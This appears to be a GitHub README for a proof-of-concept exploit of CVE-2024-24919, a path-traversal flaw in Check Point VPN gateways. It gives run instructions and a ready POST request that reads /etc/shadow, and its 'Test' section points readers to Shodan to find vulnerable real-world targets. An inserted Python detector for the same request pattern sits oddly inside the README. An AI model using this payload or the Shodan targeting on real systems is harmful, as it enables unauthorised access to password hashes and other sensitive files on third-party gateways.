Rug4lo / CVE-2024-24919-Exploit

CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.

CVE-2024-24919-Exploit

Overview

This repository contains a Python exploit for CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.

This exploit first checks whether the target is vulnerable, and then retrieves the file at the path you specify.

Severity: Critical

Usage

First clone the repository:

git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit

Make the script executable and run the exploit with python3:

chmod +x exploit.py
python3 exploit.py

Then follow the steps and you will get the contents of the file you specify.

If you are struggling, make sure the URL you specify is the main one:

https://google.com

https://google.com/search?client=firefox

POC (Proof Of Concept)

First we need to make sure that the website runs a Check Point Security Gateway with Remote Access VPN or Mobile Access software enabled.

In this exploit we are pointing to the {ip}/clients/MyCRL endpoint.

This endpoint is vulnerable when it receives a POST request whose body contains the string CSHELL/ followed by the path of the file we want to read, written as a path traversal.

The request will be something like this:

POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

We learn all of this by looking at the source code.

For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
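
On the defensive side, the request shape described above can be matched in captured traffic or reverse-proxy logs. The following detector is an added example, not code from this repository; the function names, the host `gw.example` and the sample requests are constructed for illustration, and the percent-decoding pass is a conservative normalisation, not a statement about how the gateway parses the body.

```python
from urllib.parse import unquote, urlsplit

ENDPOINT = "/clients/MyCRL"  # endpoint named in the PoC section
MARKER = "CSHELL/"           # string the PoC body contains before the path


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return "", "", body.strip()
    return parts[0].upper(), urlsplit(parts[1]).path, body.strip()


def escapes_base(body):
    """True if the path after MARKER climbs above its starting directory."""
    decoded = unquote(body).replace("\\", "/")  # one decoding pass only
    idx = decoded.find(MARKER)
    if idx < 0:
        return False
    depth = 0
    for seg in decoded[idx + len(MARKER):].split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def is_suspicious(raw):
    """Flag a POST to ENDPOINT whose body traverses out of CSHELL/."""
    method, path, body = parse_request(raw)
    return method == "POST" and path.rstrip("/") == ENDPOINT and escapes_base(body)


# Constructed sample requests (hypothetical host, not captured traffic).
HDR = "POST /clients/MyCRL HTTP/1.1\r\nHost: gw.example\r\n\r\n"
SAMPLES = {
    "page_body": HDR + "aCSHELL/../../../../../../../etc/shadow",
    "encoded_dots": HDR + "aCSHELL/%2e%2e/%2e%2e/etc/passwd",
    "stays_inside": HDR + "aCSHELL/sub/../file.crl",
    "other_path": HDR.replace(ENDPOINT, "/login") + "aCSHELL/../../etc/shadow",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name}: {'ALERT' if is_suspicious(raw) else 'ok'}")
```

Tracking directory depth segment by segment, rather than searching for a fixed number of `../` sequences, keeps the check independent of how many levels a request climbs.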

Test

If you want to test this vulnerability you can use Shodan to find some vulnerable websites, using this query in Shodan:

Server: “Check Point SVN Foundation”

References

https://nvd.nist.gov/vuln/detail/CVE-2024-24919

https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/

https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

Disclaimer

This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.
